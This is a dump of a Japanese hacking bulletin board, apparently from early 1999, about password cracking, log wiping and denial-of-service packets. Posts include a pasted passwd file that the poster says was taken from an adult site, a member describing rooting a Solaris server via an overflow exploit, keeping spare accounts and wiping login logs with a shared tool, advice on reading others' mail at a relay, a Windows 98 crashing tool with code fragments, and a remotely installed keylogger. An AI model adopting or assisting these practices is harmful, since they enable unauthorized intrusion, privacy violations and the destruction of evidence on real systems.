| 【メッセージ】 すいません〜 ファイル名・・・ばりばり日本語でした・・・(^^; また送り直します |
| 【名 前】うにゅん 【タイトル】Re:(1)どらえ○んー 02/06 01:54 |
unewn4th@usa.net |
| 【メッセージ】 DOSコマンドのcopyでできますよ。 copy c:\test\*.txt c:\all.txt |
| 【名 前】sp00ky 【タイトル】どらえ○んー 02/05 23:55 |
|
| 【メッセージ】 txtやhtmlを一括して 一つにできるっていうソフトないですか? 葉子につかいたいのです 自分専用のロボット検索ロボットがあったらいいですね |
| 【名 前】うにゅん 【タイトル】>四苦八苦さん 02/05 22:16 |
unewn4th@usa.net |
| 【メッセージ】 添付ファイル開けないっす。 ファイル名日本語ですか? すんませんが、ファイル名を半角英字で再送お願いしますです。 |
| 【名 前】うにゅん 【タイトル】re:(1)うにゅんさん 02/05 22:09 |
unewn4th@usa.net |
| 【メッセージ】 うわ。ほんとですね。 特に何もやってないんですけど... 何でだろ。 家に帰ってから調べてみますね。 |
| 【名 前】Area363 【タイトル】うにゅんさん 02/05 20:14 |
|
| 【メッセージ】 Cann't open TmpLogFile(w)... とかいわれてる>あっち パーミッションかわってる? |
| 【名 前】うにゅん 【タイトル】ちゅうことで 02/05 18:16 |
unewn4th@usa.net |
| 【メッセージ】 マーク若葉さんのカキコは、ネタとしては面白かったんですけど、 削除させてもらいました。 こういうのは、ここの趣旨じゃないんで。すいませんね。 「ネタ」は好きなんですけど、もう一ひねりしてください(笑) |
| 【名 前】四苦八苦 【タイトル】>うにゅんさん 02/05 02:17 |
|
| 【メッセージ】 ども! メ〜ル送信しましたので よろしくお願いします。 遅くなってすいませんでした。 |
| 【名 前】D70-SW 【タイトル】シャレでしょ? 02/05 01:23 |
|
| 【メッセージ】 johnてノンパス判断できなかったっけ? そういう事なので、そのパスで/bin/bashを持ってるユーザーを選んで ログインすればOK。 または新しいパスワードを求められるので適当に入力。 だいたいどうやったらそういうパスリストがとれるんだ? |
| 【名 前】Rorrim 【タイトル】Joke? 02/05 01:17 |
49-hack@ijk.com |
| 【メッセージ】 ↓どうする? 冗談にしてはきつすぎる。 一応RES付けます。 Password-Fileとは guest:ua2pjDDLXJRT2:998:998:Guest:/usr/people/guest:/bin/csh と言う風に「:」で区切られたエントリを持っています。 それぞれのエントリには、 ユーザID:Password:ユーザ番号:グループ番号:コメント:Home-Directory:Shell と意味(情報)が書かれています。 ここで言うPasswordは暗号化されています。 貴方の提示したデータにはPasswordエントリが抜けています。 よってJohnでも解けません! また貴方の書き込みはうにゅんさんの提示する禁止事項に「抵触」する恐れがあります。 よってShadowを得ても書き込まないように気を付けましょうね。 |
| 【名 前】マーク若葉 【タイトル】Pass抜き、教えてください。 02/04 23:02 |
workman@anet.ne.jp |
| 【メッセージ】 ジョン使ってパス抜きできると聞いてやってみましたが だめでした。(ジョンは初心者には難しいですね) あちらのエロサイトからデータた゛けは獲れたようなのですが あとのやり方が巧くいきません。 プロの方(笑)、どなたか抜き方と答えを教えてください。 以下データです。 ------------------------------------------------- root::0:0:root:/root:/bin/bash bin::1:1:bin:/bin: daemon::2:2:daemon:/sbin: adm::3:4:adm:/var/adm: lp::4:7:lp:/var/spool/lpd: sync::5:0:sync:/sbin:/bin/sync shutdown::6:0:shutdown:/sbin:/sbin/shutdown halt::7:0:halt:/sbin:/sbin/halt mail::8:12:mail:/var/spool/mail: news::9:13:news:/usr/lib/news: uucp::10:14:uucp:/var/spool/uucppublic: operator::11:0:operator:/root:/bin/bash games::12:100:games:/usr/games: man::13:15:man:/usr/man: postmaster::14:12:postmaster:/var/spool/mail:/bin/bash nobody::65535:100:nobody:/dev/null: ftp::404:1::/home/ftp:/bin/bash ---------------------------------------------------------- 以上 |
| 【名 前】うにゅん 【タイトル】re:(1)メール 02/04 20:00 |
unewn4th@usa.net |
| 【メッセージ】 >例の件メールしました。 了解です。 でも、全員集まってないので、ちょっと待っててください。 四苦八苦さん、トオルさんもお願いしますね。 |
| 【名 前】Rorrim 【タイトル】メール 02/04 02:12 |
49-hack@ijk.com |
| 【メッセージ】 例の件メールしました。 お願いします |
| 【名 前】HAE 【タイトル】re:(4)他人のメールを見る 02/03 21:39 |
puyoo@geocities.co.jp |
| 【メッセージ】 > たぶん、wtmpとwtmpxのエントリ不整合が原因だと思うのですが... > 解析して、ulwを修正します。 rootがいなかったので試しました。 結果はメールしました。 |
| 【名 前】うにゅん 【タイトル】ロギングツール VerUP 02/01 23:00 |
unewn4th@usa.net |
| 【メッセージ】 amuser-loggerをバージョンアップしました。 テキスト形式のロギングに加えて、HTML形式でもロギング できます。 |
| 【名 前】うにゅん 【タイトル】re:(3)他人のメールを見る 02/01 13:15 |
unewn4th@usa.net |
| 【メッセージ】 >エントリ追加って何でしょうか?(;_;すみません ~/.forwardの設定です。 フォワードしたいメールアドレスを追加するだけです。 >ulwのログ消しはもうちょい待ってください。 すいませんが、ここのLogView(logchk.c)でチェックしてもらえますか? 方法は、 % cc logchk.c -o logchk (gccでも可) % logchk > log.txt で、log.txtをメールでお願いします。 たぶん、wtmpとwtmpxのエントリ不整合が原因だと思うのですが... 解析して、ulwを修正します。 |
| 【名 前】うにゅん 【タイトル】re:(2)ロギングツール 02/01 13:10 |
unewn4th@usa.net |
| 【メッセージ】 >ここのログは掲示板開始当初の11月から持っていますので、 >1月までのログをメール付属で送っておきます。 ありがとうございます。 ちゃんと月ごとに整頓されてるし、indexも付いてて助かります。 |
| 【名 前】HAE 【タイトル】re:(2)他人のメールを見る 02/01 12:34 |
puyoo@geocities.co.jp |
| 【メッセージ】 > Bで.forwardされてるなら、エントリ追加しちゃえばできます。 > サーバに残すようにすれば、メールボックスにもたまりますから、catでも > 読めますね。 > パケットモニタリングすればならBの近所からでも見ることもできますよ。 エントリ追加って何でしょうか?(;_;すみません 別に自分でLinuxで固定したIPでやるわけじゃないので実際には試せませんが(^^; ulwのログ消しはもうちょい待ってください。 最近ずーっとrootがログインしっぱなしなので近づけないです。 怪しんでいるのかな。(^^; 予備アカあるので入れますが確実にログが消せない今入るとログインするアカ がなくなってしまうので困ります。(^^; |
| 【名 前】Hariru 【タイトル】re:(1)ロギングツール 02/01 10:20 |
hariru@ami.602.cc |
| 【メッセージ】 >ここのBBSのようなamuser-netのレンタル掲示板を自動で >ロギングするツールを作ってUPしました。マニュアルでロギングする >のがしんどくて...UNIX用です。 おおぅ、ありがとうです。 UNIXでネットにつなげたことはまだありませんが、 落ち着いたら設定しようかと思っているので助かります。 >あ、それとここの過去ログもってるヒト、いませんか〜? ここのログは掲示板開始当初の11月から持っていますので、 1月までのログをメール付属で送っておきます。 ただ、ログは手動で取っているので、11月の初期が歯抜けになってます(笑) どなたかその辺を持っている方がいましたら、追加してお願いします。 |
| 【名 前】うにゅん 【タイトル】ロギングツール 02/01 04:01 |
unewn4th@usa.net |
| 【メッセージ】 ここのBBSのようなamuser-netのレンタル掲示板を自動で ロギングするツールを作ってUPしました。マニュアルでロギングする のがしんどくて...UNIX用です。 あ、それとここの過去ログもってるヒト、いませんか〜? |
| 【名 前】うにゅん 【タイトル】re:(1)凄いっすね 02/01 01:46 |
unewn4th@usa.net |
| 【メッセージ】 >久々に復活したので見に来たら質問責めですね。 >がんばって下さい(応援) おや、ACさん。イロイロあったようですね。 掲示板はいいんですけど、更新が... 忙しくて、なかなか進まないです。 |
| 【名 前】うにゅん 【タイトル】re:(1)他人のメールを見る 02/01 01:43 |
unewn4th@usa.net |
| 【メッセージ】 >Receivedでいろんなサーバーを通過したという通った足跡がでますよね。 >このとき通過したサーバーではこのメールを奪う方法はないのでしょうか? 中略 >A -> B -> C >BサーバーでC宛のメールが読めるか?ってことです。 Bで.forwardされてるなら、エントリ追加しちゃえばできます。 サーバに残すようにすれば、メールボックスにもたまりますから、catでも 読めますね。 パケットモニタリングすればならBの近所からでも見ることもできますよ。 |
| 【名 前】谷 【タイトル】レスどうも〜 01/31 23:12 |
|
| 【メッセージ】 やはり、プロキシ通せませんでしたか。サーバ名を[test]などとしても 無理やりアタックしてしまうので、そういう気がしていました。 単純な質問に答えていただいてありがとうございました。>うにゅんさん |
| 【名 前】超初心者(^^) 【タイトル】ぐはぁ(吐血) 01/31 17:55 |
|
| 【メッセージ】 はい、本当にごめんなさい、原因判明しました。 ほんとにくだらない理由でした、はずかしい・・・ ところでなんとなくはじめて自分のFreeBSDのパスをjohnにかけてみました MD5だとかでStandardDESの七分の一ぐらいのc/sしか出ませんでした。 うーん頑丈ですねぇ。 では貴重なログを流してしまいましてすみませんでした。m(_ _)m |
| 【名 前】AC 【タイトル】凄いっすね 01/31 16:08 |
Suzume-Sakurajyousui@CyberTeam.vip.co.jphttp://www.geocities.com/Vienna/Choir/3980/ |
| 【メッセージ】 >うにゅんさん 久々に復活したので見に来たら質問責めですね。 がんばって下さい(応援) >暗号 desのhead2つまでがsoltだった気が〜。 ではでは〜(^-^)/~~~) |
| 【名 前】超初心者(^^) 【タイトル】Johnって 01/31 14:51 |
|
| 【メッセージ】 はじめまして、ちょっと質問さしてください。 johnは -w:辞書 でやった場合辞書の単語を片っ端からアタックするのではないんでしょうか? 簡単な実験パスで-w:辞書 をかけたところ辞書にあるのに引っかからなかったんです。 (あるひとつのパスだけひっかかりません、他のはかかるのに・・・) ここでいただいたcrypt3を丸ごとぱくって作った、自作の辞書総当りツール (実験的に作ったものなので激重・バグ多し・無能) ではちゃんと引っかかるんのですが・・・ |
| 【名 前】HAE 【タイトル】他人のメールを見る 01/31 11:15 |
puyoo@geocities.co.jp |
| 【メッセージ】 メールの盗聴ってできないんでしょうか? 一般的にメールのヘッダをみると Received でいろんなサーバーを通過したという通った足跡がでますよね。 このとき通過したサーバーではこのメールを奪う方法はないのでしょうか? ちょっと情報処理試験を受けようとこの間系の本をみたら「できない」と 書いてありました。なぜならサーバーの中を通過するわけではない (サーバーに保存されて再び送信する)からと書いてありました。 これってどういうことでしょう? A -> B -> C BサーバーでC宛のメールが読めるか?ってことです。 ちなみにCになりすます、とかCに進入して見るという方法はだめです。 Aサーバーが"HELO"したらBがCより先に"250"を返したり(^^;すればできるんでしょうか? |
| 【名 前】うにゅん 【タイトル】re:(1)ちょっと質問いいでしょうか? 01/31 07:19 |
unewn4th@usa.net |
| 【メッセージ】 >あそこに、Proxyを通すことってできるんでしょうか? サポートしてません。 というか、あまり意味がないと思いまして。 でも、そのうちサポートする予定にはしてますが... |
| 【名 前】谷 【タイトル】ちょっと質問いいでしょうか? 01/31 03:50 |
|
| 【メッセージ】 白木葉子、いや、プロトコル全般についての質問かもしれませんが、 FTPアドレスを入力するところがありますよね? あそこに、Proxyを通すことってできるんでしょうか? HTTPでのProxyの通し方、http://proxy.magusnet.com/-_-http://www.dna.affrc.go.jp:10080/-_-http://ターゲットの URL のように色々とhttp→ftpなどいろいろ試してみたんですが、どうも わかりません。よかったら教えてください。 |
| 【名 前】Chomsky 【タイトル】re:(6)暗号 01/29 08:58 |
Chomsky@excite.co.jphttp://thor.prohosting.com/~chomsky/ja/ |
| 【メッセージ】 >コ難しいことは数学屋にまかせて、 >技術屋はパワーで勝負ってトコですかね(笑) 的確な応用と言うのはいつの時代にもパワーが必要ですね。頭が下がります。 >だいたい世の中で完璧な乱数なんて1つしかないらしいですし。 >電子だかなんだかが飛び出すタイミングがどーのこーのだった >ような...むちゃ曖昧(笑) それはまさにスゴそうですが(放射線物質でしょうか?)ハードウェアの不確定要素を用いるとある程度高品質になるというのをどこかで聞きかじったことがあります。マウスのトラック(PGPは確かこのやりかたでしたよね)だとか、CPUの精密な速度変化とか、HDDのアクセス記録とか、ファイル全部のダイジェストの変化とか..かなり消極的ですが。(^^;) >NECなら分かるんですが、DOS/Vは手元に資料がないので分からな >かったんで、キーログは諦めたんですが... >I/O関連の資料があると、たぶん簡単に作れるとおもいますよ。 ハードウェアに依存すると言うことは、Windows支配の水面下でのキースキャンということでしょうか?高レベル領域でホックかけるとどうしてもMSINFO32.EXEに検知されてしまいます。(^^); いろいろありがとうございました。レスだんだん高度になってきて私には手に負えなくなってきましたので^^;、また拝見しながら勉強させていただく立場に戻りたいと思います。次回書き込むときも宜しくお願いします。 それでは失礼致します。 |
| 【名 前】Hariru 【タイトル】re:(7)暗号 01/29 06:59 |
hariru@ami.602.cc |
| 【メッセージ】 >辞書ファイルは英単語の集まり+記号とかはおちてますが日本語の辞書は見たこと >ないです。どっかに落ちてますか?(^^; そういえば日本語などの2バイトコードの辞書って、 どこかで聞いたことがある気もしますが、私も見たことがないですね〜。 でもそれだと4文字までしか扱えないから、 辞書を考えるのもつらくなっていく気がしますね(笑) あっ、でも4文字熟語なんかでできるか。 >johnではこの日本語パスワードにも対応してるのでしょうか? >johnのオプションにはアルファベット大文字小文字、数字、記号の設定はあっても >日本語(2バイト文字)解読できないのでは?(たぶん^^;試してません) 私も試していないけど、解読可能じゃないかな? 別に対応してるってわけでなく、文字をビット列で扱っているなら可能かな。 しかし、2バイトコードは2バイト(16ビット)全て使ってしまうから、 内部鍵生成時に各1バイトの先頭1ビットが無視されるということを考えると、 同じ暗号文でも、256個のパスワードで通るってことが起こるかも知れないなあ。 コードの違いによっては無数に・・・ まあ、そんな文字列を適当に探し当てる可能性は、 パスワード知っていない限り思いっきり低いと思いますが。 |
| 【名 前】reverse 【タイトル】re:(1)ふむ 01/28 23:48 |
esever@usa.nethttp://members.tripod.com/~reverse/ |
| 【メッセージ】 >一番似てそうなのはOverDropですかね、 失礼しました、嘘ついてましたね! フラグメント パケットを再構築できずにパニックになるバグとして認 識してたものですから... overdrop...teardropの改良版ですか。なるほど... それから、teardropとかbonkとか見てもIPチェックサムは計算してないですね。bugtraqにもありましたが独自関数を書くしかないみたいですね。 というか、libnetってなんかいいかんじですね。 libnet+libpcapのドキュメントとか誰か書いてくれないかな ^^; 個人的見解としては、Windows98にJapanese version onlyのバグがあ るとは思えないのです。しかもTCP/IPで、ですよね。ちょっと...。 統計から出した結論でしょうか?むむむ・・・ |
| 【名 前】HAE 【タイトル】re:(6)暗号 01/28 22:07 |
puyoo@geocities.co.jp |
| 【メッセージ】 パスワード解読ツールのjohnとかってどうしてパスワードファイルから パスワードの暗号部分をとってきて辞書を参照して1つずつ試していくのだろう? 辞書ファイルが最初からDESで暗号化された物になっていれば単純な比較ですむから もっと早く解読できるのではないか? という単純な考えを持っていたんですが <<ないから自分で作ってやろうと思ったんですけどね(^^; > The ShadowPenguin Documents. No.13 > > - crypt( )レシピ - を読んだら実際には2バイト勝手にsaltってのが作られてこれが違うと暗号が違うと いうのを知りました。 試しにコンパイルして実行してみるとやはり同じパスワードでもこのsaltってのが 違うとやはり結果が違いました。(まあ当然ですけど^^;) たとえばパスワードが 12345678でsaltがabだと暗号は ab1iBa.N.U2C6 12345678でsaltがbcだと cdsmm9tFWz3CI なります。全然結果が違います。 でも "やっほー"でsaltがxyだと xyfw0gP0NfMgg になります。 あたりまえだかどうかはわかりませんが2バイトの漢字コードもDESできます。 Linuxで実験したら2バイト文字のパスワードもパスワードとして認識してくれました。 辞書ファイルは英単語の集まり+記号とかはおちてますが日本語の辞書は見たこと ないです。どっかに落ちてますか?(^^; johnではこの日本語パスワードにも対応してるのでしょうか? johnのオプションにはアルファベット大文字小文字、数字、記号の設定はあっても 日本語(2バイト文字)解読できないのでは?(たぶん^^;試してません) |
| 【名 前】RZ 【タイトル】ふむ 01/28 18:50 |
|
| 【メッセージ】 一番似てそうなのはOverDropですかね、 こいつは、フラグメント化最大で、先頭と最後のパケットを交互に おくりつけるってやつです。 その最後の方のパケットによく似てますが、、、 でも全長とヘッダ長が違いますし、 大量に送りつけてもハングしないようです。 OverDropには、「これは落すためのツールじゃない」って書いてますし(笑) しかもやはりネットワーク越えはできないようですね。。 |
| 【名 前】うにゅん 【タイトル】re:(1)一番いやなのが 01/28 15:54 |
unewn4th@usa.net |
| 【メッセージ】 >ただのブルートフォースだったら、、、、 >targaのパケット数あげたら98も落ちたりして。 >外人怖い。 うははは(笑) これはイヤですね〜。コワイです(笑) ちゅうか、意味分からないコトバ喋る外人は、それだけで コワイですけど(謎) |
| 【名 前】RZ 【タイトル】一番いやなのが 01/28 15:26 |
|
| 【メッセージ】 ただのブルートフォースだったら、、、、 targaのパケット数あげたら98も落ちたりして。 外人怖い。 |
| 【名 前】うにゅん 【タイトル】re:(5)暗号 01/28 15:15 |
unewn4th@usa.net |
| 【メッセージ】 >数学的新発見というのは恐いですね. コ難しいことは数学屋にまかせて、技術屋はパワーで勝負って トコですかね(笑) >「サイコロ」にかなう乱数ルーチンは作成困難らしいです(笑)。 だいたい世の中で完璧な乱数なんて1つしかないらしいですし。 電子だかなんだかが飛び出すタイミングがどーのこーのだった ような...むちゃ曖昧(笑) コンピュータの世界じゃ、いまだにM系列とかも多く使われてますしね。 >でも、キーログ機能を追加する場合は、確か、ホック用のDLLも一緒にターゲットの >Winに置かなくてはなりませんからやや厄介ですね。 NECなら分かるんですが、DOS/Vは手元に資料がないので分からな かったんで、キーログは諦めたんですが... I/O関連の資料があると、たぶん簡単に作れるとおもいますよ。 |
| 【名 前】うにゅん 【タイトル】re:(1)Re: 01/28 14:57 |
unewn4th@usa.net |
| 【メッセージ】 >そう、チェックサムエラーが1/2がOKで1/2がNGになるのです。 >それは、なぜか知りません(笑) hsjさんもおっしゃってますが44byteのバッファのチェックサム 計算っぽいですが... しかし、確率的に1/2になるのは、良く分かりませんけど。 確率的にnullが継続する場合が多くなるから1/2は引っ掛から ないってとこでしょうか。 >ip->ihl = rand() % 16; >ip->tot_len = rand() % 0xffff; わぉ。なんかスゴイですね〜 しかし、コレって大丈夫なんですか? チェックサム検査対象バッファ長とか... まだほとんど実験してないで、よく分からないですけど。 |
| 【名 前】HAE 【タイトル】残念、無念 01/28 13:49 |
puyoo@geocities.co.jp |
| 【メッセージ】 > に変更して、エントリ数をチェックしてもらえませんか? 今日アクセスしたところなんたここの鯖の使っていたアカが使えなくなってました。 一応緊急用予備アカがあるのでそれを使ってチャレンジします。 すぐに進入するのは危険なのでちょっと待ってください(;_; |
| 【名 前】うにゅん 【タイトル】re:(4)ログ消し 01/28 13:37 |
unewn4th@usa.net |
| 【メッセージ】 うちの5台のSolarisで一台だけこの現象が出ました。 wtmpとwtmpxのエントリの不整合があるようで。 wtmpだけに、ut_lineにold time、new timeとかいう エントリが追加されてて、エントリライン数が一致しない ようです(2line違い)。 そのうちこれらのエントリを考慮して再upしますね。 |
| 【名 前】うにゅん 【タイトル】re:(3)ログ消し 01/28 11:04 |
unewn4th@usa.net |
| 【メッセージ】 >Logfile size is invalid コレは、wtmpとwtmpx、またはutmpとutmpxのエントリ数が 違ってる場合に起ります。 ログが変なコトになってるか、私が調査しきれてない現象 が起きてるのかもしれません。 if (l1!=l2 || l3!=l4){ printf("Logfile size is invalid.\n",WTMP_NAME,WTMPX_NAME); return(-1); } を、 if (l1!=l2 || l3!=l4){ printf("l1=%d,l2=%d,l3=%d,l4=%d\n",l1,l2,l3,l4); return(-1); } に変更して、エントリ数をチェックしてもらえませんか? |
| 【名 前】うにゅん 【タイトル】re:(1)Re: 01/28 10:59 |
unewn4th@usa.net |
| 【メッセージ】 あ〜、ホントに出てるー > bugtraq&packet嵐 遅くなりましたが、私もおしゃれ実験をやってみました。 Win95は死亡、あとは落ちなかったです。 う〜ん、なんでだろ... しかし、イロイロ面白いことになってるようですね(笑) |
| 【名 前】RZ 【タイトル】Re: 01/27 22:54 |
|
| 【メッセージ】 >それから、アドバイス通りにソースを変えたりもしましたが、total lengthが変わりません。 > 私もC programmerではないのですが、92行 > > send_status = sendto( sock_send, packet, 40, 0, > あたりが原因ですか? それはそれでよいです。 ヘッダ長さがかわらなくてもOKです。 これでうまく行くはずなんですが、、、 でもまぁ、外人とメールやり取りするよりラクでいいな(笑) |
| 【名 前】RZ 【タイトル】げ 01/27 22:49 |
|
| 【メッセージ】 teardropだっけ。。?? で、ヘッダが44なのに長さ40はワザとです。 私と知り合いのマシンはそれでハングアップかましてくれました。 >なかにchecksum errorなパケットが混じっている点です。半数ぐらいです。 >チェックサムがランダムなかんじです。私のLinuxおかしいですか?? そう、チェックサムエラーが1/2がOKで1/2がNGになるのです。 それは、なぜか知りません(笑) とりあえずポイントをフラグメントと長さに関してしぼってつくってたのですが。 うちのWin98がおかしいだけ?(笑) 同一セグメント内というのは、ルータを切っても通信できる環境ってことです。 |
| 【名 前】hsj 【タイトル】re:(2)試していただけませんか? 01/27 22:43 |
hsj@geocities.co.jp |
| 【メッセージ】 ども。Linuxじゃないので試せてないですが・・・ #あとでソースいじってやってみます >checksum errorなパケット は、 >in_cksum((u_short )ip,44); で、40バイトしかmallocしてないのを44バイト渡してるから だと思いますが・・・。 これはわざとですか?>RZさん >ヽ(´ー`)ノ なるほど(笑) 昨日Bugtraqで読んだ時、意味わかんないなーとか思ってました(笑) |
| 【名 前】Chomsky 【タイトル】re:(4)暗号 01/27 21:54 |
Chomsky@excite.co.jphttp://thor.prohosting.com/~chomsky/ja/ |
| 【メッセージ】 >うにゅん 様 >う〜ん、やっぱりデカ数字の >素因数分解にかかってるんでしょうかねぇ。 >これやられると一発ですから。 >他の方法もあるかもしれませんしねー。 >歴史的な耐久性っていう意味では、今使うのはちょっとコワイですね。 たしかに、ハードの進化もさることながら、数学的新発見というのは恐いですね..。楕円曲線暗号なんか、実際に欠陥部分が発見されましたし..やはり暗号は短期的に使い捨てるべき物なのでしょうね..。 >そこも56bitの存在理由なんでしょうね。 >そーいえば、ほとんどのShadowSuitesのパッケージでは >8づつの分割で16文字パスワードってのもあるらしいですけど、 >これも問題アリなようですね。 それにいくら暗号部分が良くても、その材料となる乱数が完璧でないと、極端にパフォーマンスが低下するそうですね。一方こんなに電子機器の性能が向上した現在でも、「サイコロ」にかなう乱数ルーチンは作成困難らしいです(笑)。 これに様々なホールも合わさると..完璧なセキュリティというのはなかなか難しいみたいですね.。 >おや、機能追加したんですか? >(それともwinKlogをリモートでインストールしたんでしょうか?) >新種が色々でてるようで、なんかうれしいですね〜 機能追加なんてとんでもないです(汗).。私がやったのは後者です。一応プログラマの端くれではありますが、Cはとっかかりの段階です..それにしても簡単な言語から始めるとあとがツラいです..。 でも、キーログ機能を追加する場合は、確か、ホック用のDLLも一緒にターゲットのWinに置かなくてはなりませんからやや厄介ですね。EXEに内包する形を取れると良いのですが。そういえばboはどうなんでしょうか..。(Homepageが恐くて使ったこと無い(笑)) >追加部分のソースを貼ってもらえればverUP公開します。 >で、みんな使えるようになるんで、 >新種作った人はよければ貼ってくださいね。 私からもお願いします(^^;)。 P.S. この度、Homepageを作りました。オリジナルの和訳物等を中心にしたいと思います。手始めにちょっと原理主義的でラディカルな「How To Became A Hacker」を掲載しました。「メールを送る前に」を拝見致しますと、「ハッカーになるには、どうすればいいですか?」というメールが来る、とのことですが、そんなときは一行、上記URLをかましていただけたらうれしいです(笑)。 |
| 【名 前】reverse 【タイトル】re:(1)試していただけませんか? 01/27 21:41 |
esrever@usa.nethttp://members.tripod.com/~reverse/ |
| 【メッセージ】 暇だったので試してみました。まず確認したいのですが、このパケットの異常な点は、 ・ header lengthが本当の値よりも大きく設定されている ・ 後続フラグメント有り フラグが設定されているパケットが大量に送信され、 しかも同一のフラグメントオフセットを持っている。 でしょうか。 後者は既知のバグであったと記憶してます。teardrop? 結果ですが、windows 95はブルースクリーン、98は何も起こらず、です。 インストール間も無い98です。 落ちた98というのは、header lengthの方が原因で落ちたのでしょうか? 気になる事は、同じパケットを大量に送っているはずなのですが、 なかにchecksum errorなパケットが混じっている点です。半数ぐらいです。 チェックサムがランダムなかんじです。私のLinuxおかしいですか?? それから、アドバイス通りにソースを変えたりもしましたが、total lengthが変わりません。 私もC programmerではないのですが、92行 > send_status = sendto( sock_send, packet, 40, 0, あたりが原因ですか? |
| 【名 前】RZ 【タイトル】試していただけませんか? 01/27 18:40 |
defcon0@ugtop.comhttp://www.ugtop.com |
| 【メッセージ】 win98を落すツールを作ったのですが どうも日本語バージョンのみ落ちるみたい(?)で、 詳細がよくわかりません。 そこで、LAN内にlinuxとwin98/95が存在している方、 このツールをテストしていただけませんでしょうか? 詳細は、 http://www.geek-girl.com/bugtraq/1999_1/0316.html ここにあります。 英語は、無茶苦茶です(笑) もし、だめな場合は、 send_oshare_packet()の一部分を以下のように変更してください。 ip->ihl = rand() % 16; ip->tot_len = rand() % 0xffff; ちなみに、 Is this phenomenon a bug? $B!3 (B( $B!-!<!. (B) $B%N (B これは、 Is this phenomenon a bug? ヽ(´ー`)ノ こうなってます(笑) 化けたらしい。。。 名前は「オーシェア」ではなく「おしゃれ」です(笑) 外人が「the oshare packet云々」とか「oshare running」とか 言ってるのを見ると笑えます(笑) ろしくお願いします。 |
| 【名 前】HAE 【タイトル】re:(2)ログ消し 01/27 16:07 |
puyoo@geocities.co.jp |
| 【メッセージ】 > ULW - UNYUN Log Wiper Version 1.10 for Solaris 2.x をSolaris2.5(SUN5.5)で実行した結果 Logfile size is invalid というエラーになってしまいました。 なんかログに細工でもしてあるんでしょうか? overflow-exploit for SUN OS5.5 (solaris2.5J) で一般ユーザーからrootになっているので.sh_historyとかにも cat /etc/passwd cat /etc/shadow が残ってます。まあファイルを消したりはしてないので特にやばくはないですが(^^; なんか不安です。もしばれても大丈夫だし。(^^; どうしても消えない場合は fdiskでも・・・(^^; 自分のLinuxはほぼ完璧にログ消しできます。 |
| 【名 前】うにゅん 【タイトル】re:(3)暗号 01/26 15:19 |
unewn4th@usa.net |
| 【メッセージ】 >2,048bitRSAの解読は、2022年の段階でも20,000,000年かかると >見積もられていたそうですが、どうやら眉唾モノになりそうです。 う〜ん、やっぱりデカ数字の素因数分解にかかってるんでしょうかねぇ。 これやられると一発ですから。 他の方法もあるかもしれませんしねー。 歴史的な耐久性っていう意味では、今使うのはちょっとコワイですね。 >448Bitあたり導入されるとかなりツライですね。 >もっとも人間の性質として、辞書アタックの可能性が消える >ということにはならないでしょうが..。 そこも56bitの存在理由なんでしょうね。 そーいえば、ほとんどのShadowSuitesのパッケージでは 8づつの分割で16文字パスワードってのもあるらしいですけど、 これも問題アリなようですね。 >xtcpにキースキャン機能があればPGPを抜けるのではと冗談半分に思い おや、機能追加したんですか?(それともwinKlogをリモートで インストールしたんでしょうか?) 新種が色々でてるようで、なんかうれしいですね〜 追加部分のソースを貼ってもらえればverUP公開します。で、みんな 使えるようになるんで、新種作った人はよければ貼ってくださいね。 |
| 【名 前】うにゅん 【タイトル】ここのログ 01/26 15:12 |
unewn4th@usa.net |
| 【メッセージ】 ええと、Hariruさん、私はここのログとってません(爆) っていうか、他のBBSのもとってないですが... 今のよりもうちょっとイイ全自動logger作りかけで、完成したら ログを取ろうと思ってるんですが、ほったらかしです(笑) で、お願いなんですが、もしココのログをとってる人(全部じゃなく てもいいです)がいましたら、メール添付で送ってもらえないでしょうか... お願いしますです。 |
| 【名 前】Chomsky 【タイトル】re:(2)暗号 01/26 09:48 |
Chomsky@excite.co.jp |
| 【メッセージ】 Hariru 様 レス本当にありがとうございます。チョムスキー改め、Chomskyです。 (前のは何となく情けないのでアルファベットにしました。^^;) >へえ〜。私は最近暗号に目覚めたのでそんな法則があると >知りませんでしたが、ほんと成り立っていませんね。 そのようです。この法則によりPGPでおなじみだった、2,048bitRSAの解読は、2022年の段階でも20,000,000年かかると見積もられていたそうですが、どうやら眉唾モノになりそうです。イタチごっこみたいですね...。 > 98/1・・・39日 > 98/7・・・2日と8時間 > 99/1・・・22時間15分 ^^;これ見るともはや法則なんて消し飛んでいますね..。 >簡単にいえば歴史が浅いこと、DESとの互換性の確保、 >従来のDESへの投資が無駄になるなどあるからですかね。 >ほかにも慣れやユーザへの負担、特許の問題などあるかも知れません そういった要因が絡んでいるのですか。納得しました。ようはハカリの問題と言うことなんでしょうね。暗号にかかるリスクと、セキュリティで得られる事との..。 特許などは特に結構考慮すべき問題でしょうね。中には-fishシリーズのようにパテントフリーもあるみたいですが..。 >ちなみに、DES Challengeはイベント的な要素が強く、 >今や56ビットのDESでは十分な安全性は得られないと警鐘を鳴らすこと>が、主目的だそうです。 警鐘は明らかに鳴りましたね。(^^) >これによって管理者が危機意識を持てば、 >ほかのアルゴリズムに移っていく可能性はあるかも知れませんね。 本当にそうですね。これは極端な話ですが、448Bitあたり導入されるとかなりツライですね。もっとも人間の性質として、辞書アタックの可能性が消えるということにはならないでしょうが..。 いろいろ教えていただきありがとうございました。 P.S. うにゅん 様 "PenguinDocument"、大変興味深く拝見させて頂きました。特に「Windows Hackでプライバシーを探る」の後半の辺りでは私などおよそ考えつきもしないようなユニークな方法なので勉強になりました。(同時に思わずレジストリをチェックしましたが(笑)) 暗号に興味のある私としては、xtcpにキースキャン機能があればPGPを抜けるのではと冗談半分に思い、早速友人に頼んで実験してみたのですが、これがあっけなく成功してしまい、二人とも背筋が寒くなった次第です(笑)。 とにかくありがとうございました。これからも頑張って下さい。 |
| 【名 前】Hariru 【タイトル】re:(1)暗号 01/26 07:19 |
hariru@ami.602.cc |
